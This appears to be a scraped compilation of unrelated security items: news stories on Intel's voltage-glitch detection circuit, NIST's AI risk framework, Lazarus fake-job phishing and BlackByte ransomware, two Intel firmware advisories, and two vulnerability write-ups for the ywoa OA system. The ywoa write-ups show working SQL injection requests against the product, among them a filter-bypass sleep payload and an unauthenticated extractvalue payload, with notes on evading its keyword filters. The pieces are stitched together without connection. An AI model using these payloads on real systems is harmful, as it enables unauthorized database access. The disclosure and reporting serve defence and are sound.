DeepSurface’s Tim Morgan explains how network complexity and cloud computing have contributed to the challenge, and how automation can help.

Vulnerability management has changed dramatically in recent years, thanks to greater volume of risks. DeepSurface’s Tim Morgan explains how network complexity and cloud computing have contributed to this challenge, and how automation can help. Morgan parses automation, artificial intelligence, and machine learning, plus a few tips on how to cut through the hype. He also offers advice on how CISOs can better communicate about risk with their boards.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

DeepSurface Adds Risk-Based Approach to Vulnerability Management

The countermeasure, which compares the time and voltage at which circuits are activated, is being implemented in 12th Gen Intel Core processors.

Intel has developed and incorporated a circuit into its latest line of PC chips that can detect when attackers are using motherboard exploits to extract information from PC devices.

The "tunable replica circuit" on the latest Intel chips can detect attempts to glitch systems through voltage, clock, or electromagnetic techniques, Intel said during Black Hat. Attackers use these techniques to insert their own firmware and take control of the device.

"Every semiconductor ever produced is vulnerable to these attacks. The question is, how easy is it to exploit? We've just made it a lot harder to exploit because we detect these attacks," says Daniel Nemiroff, senior principal engineer at Intel.

The circuit is being implemented in Alder Lake, the 12th Gen Intel Core processors, which are used in laptops. Servers may get this technology at a later date, Nemiroff says.

**The Circuit's Inner Workings**

Typically, when a computer turns on, the silicon's power management controller waits for the voltage to ramp to a certain value before it starts activating components. For example, the power management controller activates the security engine, the USB controller, and other circuits when they reach their voltage values.

Under normal operations, once the microcontrollers activate, the security engine loads its firmware. In this motherboard hack, attackers attempt to trigger an error condition by lowering the voltage. The resulting glitch gives attackers the opportunity to load malicious firmware, which provides full access to information such as biometric data stored in trusted platform module circuits.

The tunable replica circuit protects systems against such attacks. Nemiroff describes the circuit as a countermeasure to prevent the hardware attack by matching the time and corresponding voltage at which circuits on a motherboard are activated. If the values don't match, the circuit detects an attack and generates an error, which will cause the chip's security layer to activate a failsafe and go through a reset.

"The only reason that could be different is because someone had slowed down the data line so much that it was an attack," Nemiroff says.

Such attacks are challenging to execute because attackers need to get access to the motherboard and attach components, such as voltage regulators, to execute the hack. The attackers will also need to know the exact time at which to mount a voltage glitch and what voltage they should drive to the pin.

"It's practical in the sense that if someone has stolen your machine from a taxi \[and\] brings it to their lab, they've got all the time in the world to open the laptop and then solder the right voltage generator lines to the machine itself," Nemiroff said.

That is the reason why the circuit is currently being integrated into chips used for laptops and not servers and desktops. Servers and desktops are not as portable and, thus, harder to steal, Nemiroff says.

**Deploying Countermeasures**

While no evidence of a motherboard exploit used in this manner exists, defenses need to be incorporated now, before attacks become widespread.

"There's no recorded exploit of an Intel PC system using these attacks, but there are various examples of other devices that have been attacked that are more interesting, like discrete TPMs and smart cards," Nemiroff says.

Glitching the security of a system isn't novel; it has existed in pay TV and smart cards for more than two decades, said Dmitry Nedospasov, who runs hardware security services provider Toothless Consulting and Advanced Security Training, which provides information security training.

Intel is adding system countermeasures to its platform controller hub, not its CPU. It's not clear to what extent the countermeasure implemented in the controller hub would be capable of protecting the system.

"The threat model is not clear and so is the reason why this mitigation is required," Nedospasov said.

As to the effectiveness of the circuit, it will be hard to verify whether it works without some kind of peer review, Nedospasov said.

"It's not clear what will and will not work in practice," Nedospasov said.

A lot of the patents on hardware countermeasures for chips were created in the 1990s and early 2000s, many of which came from pay TV.

"What this also means is that the 20-year patent periods have already expired or are expiring in the coming years. Many in the industry believe that we can expect more and more hardware countermeasures as manufacturers will no longer have to license the patents to implement these protections," Nedospasov said.

It is possible customers are putting pressure on Intel to shore up its on-chip security mechanisms, Nedospasov said.

"The bar is being raised and people are running out of software and firmware attacks, but they are going to come at us with hardware attacks. We figure this is the right time to deploy those kinds of countermeasures," Nemiroff said.

Intel Adds New Circuit to Chips to Ward Off Motherboard Exploits

NIST is developing the AI Risk Management Framework and a companion playbook to help organizations navigate algorithmic bias and risk.

As organizations begin to adopt AI products, systems, and services into their environment, they are looking for guidance on mitigating algorithmic biases and other risks. The big fear of AI is that it may be used in ways the designers did not attend.  

This focus – being aware of human impact on technology – is part of the “socio-technical” effort by the National Institute of Standards and Technology to develop a framework to help organizations navigate bias in AI and incorporating trust in the systems. NIST is currently asking for public and private comments on the second draft of the Artificial Intelligence Risk Management Framework and on the companion NIST AI RMF Playbook. The AI RMF Playbook is intended to help organizations implement the framework, with suggested actions, references, and supplementary guidance.

The framework is split into to four functions: Govern, Map, Measure, and Manage. The playbook will offer guidance on the first two functions, Govern and Map. Recommendations for the latter two, Measure and Manage, will be available at a later date.

NIST says its socio-technical approach will “connect the technology to societal values,” and will develop guidance that considers ways humans can impact how technology is used. The framework also examines “the interplay between bias and cybersecurity and how they interact with each other,” NIST said when the first draft was introduced.

The NIST Artificial Intelligence Risk Management Framework has focused on three types of biases associated with AI: statistical, systemic, and human. Current recommendations include fostering a governance structure with clear individual roles and responsibilities, and a professional culture that supports transparent feedback on technologies and products. A systemic bias would be a business or operating process which contributes to a consistently skewed decision.

“From my experience, what I’ve seen is the reliance on AI too much,” says Chuck Everette, director of cybersecurity advocacy at Deep Instinct. ”I see it too often that organizations forget that threats are constantly evolving and changing, therefore you have to make sure your AI algorithms are properly tuned and your models are properly being adapted to the newest threats. Also, I’ve seen cases where bias data has been used and introduced, therefore leaving environments open to certain types of attack due to inaccurate data training.”

The comment period for both draft versions end Sept. 29. The final version of the AI RMF is expected in early 2023, and playbook will be after that.

NIST Weighs in on AI Risk

APTs continue to exploit the dynamic job market and the persistent phenomenon of remote working, as explored by PwC at Black Hat USA.

Fake job offers have become a top phishing tactic for state-sponsored threat actors to lure in unsuspecting targets in the wake of the COVID-19 pandemic, as many reconsider their careers amid growing demand for skilled workers and managers.

The cyber-threat analyst team at PwC, which has followed a prime example of this (the Lazarus Group's Operation In(ter)ception) closely, presented a detailed account of the Lazarus campaign and how the group implemented the strategy during last week's Black Hat USA 2022 conference in Las Vegas.

PwC principal threat analyst Sveva Vittoria Scenarelli, who studies advanced persistent threats (APTs) in the Asia-Pacific region with an emphasis on North Korea, noted that the stakes are high.

"This is an espionage-motivated campaign that is incredibly persistent in targeting the aerospace sector, the defense industrial base, manufacturing chemical sector, for everything from military secrets to intellectual property to confidential information of strategic interest," Scenarelli explained during her presentation at Black Hat, called "Talent Need Not Apply: Tradecraft and Objectives of Job-themed APT Social Engineering."

The Cybersecurity & Infrastructure Security Agency (CISA) agrees, and has warned that the threat actors (aka APT38, Black Artemis, BlueNoroff, Hidden Cobra, and Stardust Chollima) "employ malicious cyberactivity to collect intelligence, conduct attacks, and generate revenue."

Scenarelli explained that Lazarus follows up with its targets via messaging apps such as WhatsApp.

This is "to make sure that the victims do open the malicious viewer documents or the malicious executables that the threat actor has sent," she said. "Black Artemis will also set up domains. This can be for command and control of its malicious implants to send emails that appear to come from on a legit site, or indeed to perform Web exploitation as an initial access method."

Scenarelli explained that Black Artemis creates domains that spoof prominent job search websites like Indeed, with attractive positions at high-profile companies such as Google and Oracle. She underscored that many sites look legitimate, though there are obvious signs they are fake. For instance, the Indeed decoy site URL is Indeed.US.org, she said. Scenarelli noted that the job descriptions disguised as .docx, .pdf, or .rtx files launch when the victims click on the documents, which may enable macros.

Similarly, Scenarelli recalled another attack by the group, which made off with $625 million in cryptocurrency. She warned that this variant, which PwC researchers call "Black Alicanto," is financially motivated and dangerous. In the wake of Microsoft recently disabling macros in Office documents, Scenarelli said this malware might use .lnk files, perhaps embedded in password-protected Microsoft Word documents.

"Threat actors are having to pivot a bit in their initial access techniques and using more and more .lnk files, ISO files, MSI installers, and stuff like that," she said. But in the background, she noted, the .lnk file is calling MSHDA.exe, which connects to a remote server to pull down a malicious JavaScript script that PwC calls "Cabbage Loader."

This script places a .lnk file in the victim's startup folder "to ensure persistence and then pulls down a whole series of other JavaScript payloads," she explained. "These are essentially profilers that want to make sure that the actual person that's interacting with them is not a sandbox, is not a researcher, but it's actually a target of interest."

Scenarelli concluded that Lazarus and other North Korea-based threat actors continue to exploit the growing demand for skilled people, who, despite their training and awareness of threats, can be caught off guard.

"The job market right now is a really key area for North Korea-based threat actors," she said. "So, keep your eyes peeled, make sure you're aware of whom you're interviewing. And for the love of all that is holy, don't open those links that you get sent on LinkedIn, do not open them."

State-Sponsored APTs Dangle Job Opps to Lure In Spy Victims

Version 2.0 of the ransomware group's operation borrows extortion tactics from the LockBit 3.0 group.

The BlackByte ransomware group, which has connections to Conti, has resurfaced after a hiatus with a new social media presence on Twitter and new extortion methods borrowed from the better-known LockBit 3.0 gang.  

According to reports, the ransomware group is using various Twitter handles to promote the updated extortion strategy, leak site, and data auctions. The new scheme lets victims to pay to extend the publishing of their stolen data by 24 hours ($5,000), download the data ($200,000) or destroy all the data ($300,000). It's a strategy the LockBit 3.0 group already pioneered.

"It is not surprising BlackByte is taking a page out of LockBit's book by not only announcing a version 2 of their ransomware operation but also adopting the pay to delay, download, or destroy extortion model," says Nicole Hoffman, senior cyber-threat intelligence analyst at Digital Shadows, who calls the market for ransomware groups "competitive" and explains LockBit is one of the most prolific and active ransomware groups globally.

Hoffman adds it is possible BlackByte is trying to gain a competitive advantage or trying to gain media attention to recruit and grow its operations.

"Although the double-extortion model is not broken by any means, this new model may be a way for groups to introduce multiple revenue streams," she says. "It will be interesting to see if this new model becomes a trend among other ransomware groups or just a fad that is not widely adopted."

Oliver Tavakoli, CTO at Vectra, calls this approach an "interesting business innovation."

"It allows smaller payments to be collected from victims who are almost certain they won’t pay the ransom but want to hedge for a day or two as they investigate the extent of the breach," he says.

John Bambenek, principal threat hunter at Netenrich, points out ransomware actors have played around with a variety of models to maximize their revenue.

"This almost looks like an experiment on if they can get lower tiers of money," he says. "I just don't know why anyone would pay them anything except for destroying all the data. That said, attackers, like any industry, are experimenting with business models all the time."

**Causing Disruption With Common Tactics**

BlackByte has remained one of the more common ransomware variants, infecting organizations worldwide and previously employing a worm capability similar to Conti's precursor Ryuk. But Harrison Van Riper, senior intelligence analyst at Red Canary, notes that BlackByte is just one of several ransomware-as-a-service (RaaS) operations that have the potential to cause a lot of disruption with relatively common tactics and techniques.

"Like most ransomware operators, the techniques BlackByte uses are not particularly sophisticated, but that doesn’t mean they aren’t impactful," he says. "The option to extend the victim's timeline is likely an effort to get at least some sort of payment from victims who may want extra time for a variety of reasons: to determine legitimacy and scope of the data theft or continue ongoing internal discussion on how to respond, to name a couple of reasons."

Tavakoli says cybersecurity pros should view BlackByte less as an individual static actor and more as a brand that can have a new marketing campaign tied to it at any time; he notes the set of underlying techniques to carry off the attacks seldom change.

"The precise malware or entry vector utilized by a given ransomware brand may change over time, but the sum of techniques used across all of them are pretty constant," he says. "Get your controls in place, ensure you have detection capabilities for attacks which target your valuable data, and run simulated attacks to test your people, processes and procedures."

**BlackByte Targets Critical Infrastructure**

Bambenek says that because BlackByte has made some mistakes (such as an error with accepting payments in the new site), from his perspective it may be a little lower on the skill level than others.

"However, open source reporting says they are still compromising big targets, including those in critical infrastructure," he says. "The day is coming when a significant infrastructure provider is taken down via ransomware that will create more than just a supply chain issue than we saw with Colonial Pipeline."

In February, the FBI and US Secret Service released a joint cybersecurity advisory on BlackByte, warning that attackers deploying the ransomware had infected organizations in at least three US critical infrastructure sectors.

BlackByte Ransomware Gang Returns With Twitter Presence, Tiered Pricing

Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

Ywoa before v6.1 was discovered to contain a SQL injection vulnerability via /oa/setup/checkPool?database.

**Environment construction**

http://partner.yimihome.com/static/index.html#/index/sys\_env

Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can

http://172.16.140.189:8088/oa/setup/license.jsp

Once installed here, the source code is available for download at gitee

https://gitee.com/bestfeng/yimioa

Download a good local idea to open a static look at the code on

**\[Frontend\] <6.1 Version Unauthorized SQL Injection**

  
Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code  
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java  
  
The above does not need to care, specifically note the following if(isValid)  
  
First get the version from the configuration  
  
Get to version 6.1, then start the version determination  
  
Determine if it is less than 3  
  
Determine if it is less than 4  
  
Determine if it is less than 5  
  
Determine if it is equal to 6  
  
The condition to be used here is that the version needs to be <= 6 in order to be successful  
So change the version  
  
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java  
  
  
Just change the value of the version field in the oa\_sys\_ver table in the database  
  
Restart tomcat after the change, and then request the specified interface without logging in

POST /oa/setup/checkPool?database=test' HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

Found that the return here actually has a return, will prompt the SQL statement to report an error  
  
Here we bring out the user directly with extractvalue  
  
**POC**

and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))\--+

**HTTP**

POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1
Host: 172.16.140.186:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

CVE-2022-36606: yimiYWOA<6.1 version foreground unauthorized SQL injection · Issue #25 · cloudwebsoft/ywoa

Improper buffer restrictions in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® NUC Laptop Kit Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® NUC Laptop Kits may allow escalation of privilege.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-28858

Description: Improper buffer restriction in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-33209

Description: Improper input validation in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-27493

Description: Improper initialization in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable an escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-34488

Description: Improper buffer restrictions in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.5 High

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-32579

Description: Improper initialization in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.9 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-34345

Description: Improper input validation in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.9 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® NUC M15 Laptop Kit: LAPBC510, LAPBC710 before version BC0076.

**Recommendations:**

Intel recommends updating the Intel® NUCs listed above to version BC0076 or later.

Updates are available for download at this location: https://www.intel.com/content/www/us/en/download/19683/bios-update-for-the-intel-nuc-m15-laptop-kit-lapbcx10-bctgl357.html

**Acknowledgements:**

Intel would like to thank the Binarly efiXplorer team for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-34488: INTEL-SA-00712

Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® AMT and Intel® Standard Manageability Advisory**

Intel ID:

INTEL-SA-00709

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

HIGH

Original release:

08/09/2022

Last revised:

08/09/2022

**Summary: **

Potential security vulnerabilities in the Intel® Active Management Technology (AMT) and Intel® Standard Manageability may allow escalation of privilege or information disclosure. Intel is releasing prescriptive guidance to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-30601

Description: Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow an unauthenticated user to potentially enable information disclosure and escalation of privilege via network access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

CVEID: CVE-2022-30944

Description: Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 7.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

CVEID: CVE-2022-28697

Description: Improper access control in firmware for Intel(R) AMT and Intel(R) Standard Manageability may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.0 High

CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

**Affected Products:**

All versions of Intel® AMT and Intel® Standard Manageability.

Note: Firmware versions of Intel® AMT 3.x through 10.x are no longer supported versions. There is no new general release planned for these versions.

Intel will only provide prescriptive guidance for supported versions; no code changes are planned.

**Recommendations:**

Intel recommends that users follow the steps below to address these issues:

For Intel® AMT and Intel® Standard Manageability, Intel recommends users follow existing security best practices and alternate security controls, including:

*   CVE-2022-30944, CVE-2022-30601: Enable Transport Layer Security (TLS) for Intel® AMT and Intel® Standard Manageability.
*   CVE-2022-28697: Enable BIOS password protection on the Intel® Management Engine BIOS Extension (Intel® MEBX).  Intel recommends end-users to reset and then set non-default password for Intel® AMT or Intel® Standard Manageability immediately following receipt of the system from the systems manufacturer.

Additional guidance is provided at this support page.

**Acknowledgements:**

Intel would like to thank Seth W Dailey (Z-winK) for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

